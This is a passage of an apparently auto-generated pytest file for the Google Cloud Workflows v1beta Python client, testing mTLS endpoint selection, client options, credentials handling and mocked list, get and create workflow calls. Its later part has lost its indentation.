    "DEFAULT_ENDPOINT",
    modify_default_endpoint(WorkflowsAsyncClient),
)
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
def test_workflows_client_mtls_env_auto(
    client_class, transport_class, transport_name, use_client_cert_env
):
    """With GOOGLE_API_USE_MTLS_ENDPOINT="auto", the endpoint must switch to
    the mTLS one only when GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and a
    client cert (explicit or ADC-provided) exists."""
    # This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
    # mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
    # Check the case client_cert_source is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
    ):
        options = client_options.ClientOptions(
            client_cert_source=client_cert_source_callback
        )
        with mock.patch.object(transport_class, "__init__") as patched:
            patched.return_value = None
            client = client_class(client_options=options, transport=transport_name)
            if use_client_cert_env == "false":
                expected_client_cert_source = None
                expected_host = client.DEFAULT_ENDPOINT
            else:
                expected_client_cert_source = client_cert_source_callback
                expected_host = client.DEFAULT_MTLS_ENDPOINT
            patched.assert_called_once_with(
                credentials=None,
                credentials_file=None,
                host=expected_host,
                scopes=None,
                client_cert_source_for_mtls=expected_client_cert_source,
                quota_project_id=None,
                client_info=transports.base.DEFAULT_CLIENT_INFO,
                always_use_jwt_access=True,
            )
    # Check the case ADC client cert is provided. Whether client cert is used depends on
    # GOOGLE_API_USE_CLIENT_CERTIFICATE value.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
    ):
        with mock.patch.object(transport_class, "__init__") as patched:
            with mock.patch(
                "google.auth.transport.mtls.has_default_client_cert_source",
                return_value=True,
            ):
                with mock.patch(
                    "google.auth.transport.mtls.default_client_cert_source",
                    return_value=client_cert_source_callback,
                ):
                    if use_client_cert_env == "false":
                        expected_host = client.DEFAULT_ENDPOINT
                        expected_client_cert_source = None
                    else:
                        expected_host = client.DEFAULT_MTLS_ENDPOINT
                        expected_client_cert_source = client_cert_source_callback
                    patched.return_value = None
                    client = client_class(transport=transport_name)
                    patched.assert_called_once_with(
                        credentials=None,
                        credentials_file=None,
                        host=expected_host,
                        scopes=None,
                        client_cert_source_for_mtls=expected_client_cert_source,
                        quota_project_id=None,
                        client_info=transports.base.DEFAULT_CLIENT_INFO,
                        always_use_jwt_access=True,
                    )
    # Check the case client_cert_source and ADC client cert are not provided.
    with mock.patch.dict(
        os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}
    ):
        with mock.patch.object(transport_class, "__init__") as patched:
            with mock.patch(
                "google.auth.transport.mtls.has_default_client_cert_source",
                return_value=False,
            ):
                patched.return_value = None
                client = client_class(transport=transport_name)
                patched.assert_called_once_with(
                    credentials=None,
                    credentials_file=None,
                    host=client.DEFAULT_ENDPOINT,
                    scopes=None,
                    client_cert_source_for_mtls=None,
                    quota_project_id=None,
                    client_info=transports.base.DEFAULT_CLIENT_INFO,
                    always_use_jwt_access=True,
                )
@pytest.mark.parametrize("client_class", [WorkflowsClient, WorkflowsAsyncClient])
@mock.patch.object(
    WorkflowsClient, "DEFAULT_ENDPOINT", modify_default_endpoint(WorkflowsClient)
)
@mock.patch.object(
    WorkflowsAsyncClient,
    "DEFAULT_ENDPOINT",
    modify_default_endpoint(WorkflowsAsyncClient),
)
def test_workflows_client_get_mtls_endpoint_and_cert_source(client_class):
    """get_mtls_endpoint_and_cert_source must honor the
    GOOGLE_API_USE_CLIENT_CERTIFICATE and GOOGLE_API_USE_MTLS_ENDPOINT env
    vars, returning the right (endpoint, cert_source) pair for each case."""
    mock_client_cert_source = mock.Mock()
    # Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "true".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
        mock_api_endpoint = "foo"
        options = client_options.ClientOptions(
            client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
        )
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
            options
        )
        assert api_endpoint == mock_api_endpoint
        assert cert_source == mock_client_cert_source
    # Test the case GOOGLE_API_USE_CLIENT_CERTIFICATE is "false".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "false"}):
        mock_client_cert_source = mock.Mock()
        mock_api_endpoint = "foo"
        options = client_options.ClientOptions(
            client_cert_source=mock_client_cert_source, api_endpoint=mock_api_endpoint
        )
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source(
            options
        )
        assert api_endpoint == mock_api_endpoint
        assert cert_source is None
    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "never".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
        assert api_endpoint == client_class.DEFAULT_ENDPOINT
        assert cert_source is None
    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "always".
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
        api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
        assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
        assert cert_source is None
    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert doesn't exist.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
        with mock.patch(
            "google.auth.transport.mtls.has_default_client_cert_source",
            return_value=False,
        ):
            api_endpoint, cert_source = client_class.get_mtls_endpoint_and_cert_source()
            assert api_endpoint == client_class.DEFAULT_ENDPOINT
            assert cert_source is None
    # Test the case GOOGLE_API_USE_MTLS_ENDPOINT is "auto" and default cert exists.
    with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "true"}):
        with mock.patch(
            "google.auth.transport.mtls.has_default_client_cert_source",
            return_value=True,
        ):
            with mock.patch(
                "google.auth.transport.mtls.default_client_cert_source",
                return_value=mock_client_cert_source,
            ):
                (
                    api_endpoint,
                    cert_source,
                ) = client_class.get_mtls_endpoint_and_cert_source()
                assert api_endpoint == client_class.DEFAULT_MTLS_ENDPOINT
                assert cert_source == mock_client_cert_source
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name",
    [
        (WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc"),
        (
            WorkflowsAsyncClient,
            transports.WorkflowsGrpcAsyncIOTransport,
            "grpc_asyncio",
        ),
    ],
)
def test_workflows_client_client_options_scopes(
    client_class, transport_class, transport_name
):
    """Scopes given via client_options must be forwarded to the transport."""
    options = client_options.ClientOptions(scopes=["1", "2"],)
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options, transport=transport_name)
        expected_kwargs = dict(
            credentials=None,
            credentials_file=None,
            host=client.DEFAULT_ENDPOINT,
            scopes=["1", "2"],
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
        patched.assert_called_once_with(**expected_kwargs)
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name,grpc_helpers",
    [
        (WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc", grpc_helpers),
        (
            WorkflowsAsyncClient,
            transports.WorkflowsGrpcAsyncIOTransport,
            "grpc_asyncio",
            grpc_helpers_async,
        ),
    ],
)
def test_workflows_client_client_options_credentials_file(
    client_class, transport_class, transport_name, grpc_helpers
):
    """A credentials_file in client_options must be forwarded to the transport."""
    options = client_options.ClientOptions(credentials_file="credentials.json")
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options, transport=transport_name)
        expected_kwargs = dict(
            credentials=None,
            credentials_file="credentials.json",
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
        patched.assert_called_once_with(**expected_kwargs)
def test_workflows_client_client_options_from_dict():
    """A plain dict passed as client_options is accepted and its api_endpoint
    reaches the transport unchanged."""
    with mock.patch(
        "google.cloud.workflows_v1beta.services.workflows.transports.WorkflowsGrpcTransport.__init__"
    ) as patched_init:
        patched_init.return_value = None
        client = WorkflowsClient(client_options={"api_endpoint": "squid.clam.whelk"})
        expected_kwargs = dict(
            credentials=None,
            credentials_file=None,
            host="squid.clam.whelk",
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
        patched_init.assert_called_once_with(**expected_kwargs)
@pytest.mark.parametrize(
    "client_class,transport_class,transport_name,grpc_helpers",
    [
        (WorkflowsClient, transports.WorkflowsGrpcTransport, "grpc", grpc_helpers),
        (
            WorkflowsAsyncClient,
            transports.WorkflowsGrpcAsyncIOTransport,
            "grpc_asyncio",
            grpc_helpers_async,
        ),
    ],
)
def test_workflows_client_create_channel_credentials_file(
    client_class, transport_class, transport_name, grpc_helpers
):
    """Credentials loaded from credentials_file (not ADC) must be the ones the
    channel is created with."""
    # Check the case credentials file is provided.
    options = client_options.ClientOptions(credentials_file="credentials.json")
    with mock.patch.object(transport_class, "__init__") as patched:
        patched.return_value = None
        client = client_class(client_options=options, transport=transport_name)
        patched.assert_called_once_with(
            credentials=None,
            credentials_file="credentials.json",
            host=client.DEFAULT_ENDPOINT,
            scopes=None,
            client_cert_source_for_mtls=None,
            quota_project_id=None,
            client_info=transports.base.DEFAULT_CLIENT_INFO,
            always_use_jwt_access=True,
        )
    # test that the credentials from file are saved and used as the credentials.
    with mock.patch.object(
        google.auth, "load_credentials_from_file", autospec=True
    ) as load_creds, mock.patch.object(
        google.auth, "default", autospec=True
    ) as adc, mock.patch.object(
        grpc_helpers, "create_channel"
    ) as create_channel:
        creds = ga_credentials.AnonymousCredentials()
        file_creds = ga_credentials.AnonymousCredentials()
        load_creds.return_value = (file_creds, None)
        adc.return_value = (creds, None)
        client = client_class(client_options=options, transport=transport_name)
        create_channel.assert_called_with(
            "workflows.googleapis.com:443",
            credentials=file_creds,
            credentials_file=None,
            quota_project_id=None,
            default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
            scopes=None,
            default_host="workflows.googleapis.com",
            ssl_credentials=None,
            options=[
                ("grpc.max_send_message_length", -1),
                ("grpc.max_receive_message_length", -1),
            ],
        )
@pytest.mark.parametrize("request_type", [workflows.ListWorkflowsRequest, dict,])
def test_list_workflows(request_type, transport: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.ListWorkflowsResponse(
next_page_token="next_page_token_value", unreachable=["unreachable_value"],
)
response = client.list_workflows(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.ListWorkflowsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkflowsPager)
assert response.next_page_token == "next_page_token_value"
assert response.unreachable == ["unreachable_value"]
def test_list_workflows_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
client.list_workflows()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.ListWorkflowsRequest()
@pytest.mark.asyncio
async def test_list_workflows_async(
transport: str = "grpc_asyncio", request_type=workflows.ListWorkflowsRequest
):
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
workflows.ListWorkflowsResponse(
next_page_token="next_page_token_value",
unreachable=["unreachable_value"],
)
)
response = await client.list_workflows(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.ListWorkflowsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListWorkflowsAsyncPager)
assert response.next_page_token == "next_page_token_value"
assert response.unreachable == ["unreachable_value"]
@pytest.mark.asyncio
async def test_list_workflows_async_from_dict():
await test_list_workflows_async(request_type=dict)
def test_list_workflows_field_headers():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.ListWorkflowsRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
call.return_value = workflows.ListWorkflowsResponse()
client.list_workflows(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_workflows_field_headers_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.ListWorkflowsRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
workflows.ListWorkflowsResponse()
)
await client.list_workflows(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_workflows_flattened():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.ListWorkflowsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_workflows(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_workflows_flattened_error():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_workflows(
workflows.ListWorkflowsRequest(), parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_workflows_flattened_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.ListWorkflowsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
workflows.ListWorkflowsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_workflows(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_workflows_flattened_error_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_workflows(
workflows.ListWorkflowsRequest(), parent="parent_value",
)
def test_list_workflows_pager(transport_name: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
workflows.ListWorkflowsResponse(
workflows=[
workflows.Workflow(),
workflows.Workflow(),
workflows.Workflow(),
],
next_page_token="abc",
),
workflows.ListWorkflowsResponse(workflows=[], next_page_token="def",),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(),], next_page_token="ghi",
),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(), workflows.Workflow(),],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_workflows(request={})
assert pager._metadata == metadata
results = [i for i in pager]
assert len(results) == 6
assert all(isinstance(i, workflows.Workflow) for i in results)
def test_list_workflows_pages(transport_name: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials, transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_workflows), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
workflows.ListWorkflowsResponse(
workflows=[
workflows.Workflow(),
workflows.Workflow(),
workflows.Workflow(),
],
next_page_token="abc",
),
workflows.ListWorkflowsResponse(workflows=[], next_page_token="def",),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(),], next_page_token="ghi",
),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(), workflows.Workflow(),],
),
RuntimeError,
)
pages = list(client.list_workflows(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_workflows_async_pager():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workflows), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
workflows.ListWorkflowsResponse(
workflows=[
workflows.Workflow(),
workflows.Workflow(),
workflows.Workflow(),
],
next_page_token="abc",
),
workflows.ListWorkflowsResponse(workflows=[], next_page_token="def",),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(),], next_page_token="ghi",
),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(), workflows.Workflow(),],
),
RuntimeError,
)
async_pager = await client.list_workflows(request={},)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager:
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, workflows.Workflow) for i in responses)
@pytest.mark.asyncio
async def test_list_workflows_async_pages():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials,)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_workflows), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
workflows.ListWorkflowsResponse(
workflows=[
workflows.Workflow(),
workflows.Workflow(),
workflows.Workflow(),
],
next_page_token="abc",
),
workflows.ListWorkflowsResponse(workflows=[], next_page_token="def",),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(),], next_page_token="ghi",
),
workflows.ListWorkflowsResponse(
workflows=[workflows.Workflow(), workflows.Workflow(),],
),
RuntimeError,
)
pages = []
async for page_ in (await client.list_workflows(request={})).pages:
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [workflows.GetWorkflowRequest, dict,])
def test_get_workflow(request_type, transport: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.Workflow(
name="name_value",
description="description_value",
state=workflows.Workflow.State.ACTIVE,
revision_id="revision_id_value",
service_account="service_account_value",
source_contents="source_contents_value",
)
response = client.get_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.GetWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workflows.Workflow)
assert response.name == "name_value"
assert response.description == "description_value"
assert response.state == workflows.Workflow.State.ACTIVE
assert response.revision_id == "revision_id_value"
assert response.service_account == "service_account_value"
def test_get_workflow_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
client.get_workflow()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.GetWorkflowRequest()
@pytest.mark.asyncio
async def test_get_workflow_async(
transport: str = "grpc_asyncio", request_type=workflows.GetWorkflowRequest
):
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
workflows.Workflow(
name="name_value",
description="description_value",
state=workflows.Workflow.State.ACTIVE,
revision_id="revision_id_value",
service_account="service_account_value",
)
)
response = await client.get_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.GetWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, workflows.Workflow)
assert response.name == "name_value"
assert response.description == "description_value"
assert response.state == workflows.Workflow.State.ACTIVE
assert response.revision_id == "revision_id_value"
assert response.service_account == "service_account_value"
@pytest.mark.asyncio
async def test_get_workflow_async_from_dict():
await test_get_workflow_async(request_type=dict)
def test_get_workflow_field_headers():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.GetWorkflowRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
call.return_value = workflows.Workflow()
client.get_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_workflow_field_headers_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.GetWorkflowRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workflows.Workflow())
await client.get_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_get_workflow_flattened():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.Workflow()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_workflow(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_workflow_flattened_error():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_workflow(
workflows.GetWorkflowRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_get_workflow_flattened_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = workflows.Workflow()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(workflows.Workflow())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_workflow(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_workflow_flattened_error_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_workflow(
workflows.GetWorkflowRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [workflows.CreateWorkflowRequest, dict,])
def test_create_workflow(request_type, transport: str = "grpc"):
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.create_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.CreateWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_create_workflow_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = WorkflowsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
client.create_workflow()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.CreateWorkflowRequest()
@pytest.mark.asyncio
async def test_create_workflow_async(
transport: str = "grpc_asyncio", request_type=workflows.CreateWorkflowRequest
):
client = WorkflowsAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.create_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == workflows.CreateWorkflowRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_create_workflow_async_from_dict():
await test_create_workflow_async(request_type=dict)
def test_create_workflow_field_headers():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.CreateWorkflowRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.create_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_create_workflow_field_headers_async():
client = WorkflowsAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = workflows.CreateWorkflowRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.create_workflow(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_create_workflow_flattened():
client = WorkflowsClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.create_workflow), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.create_workflow(
parent="parent_value",
workflow=workflows.Workflow(name="name_value"),
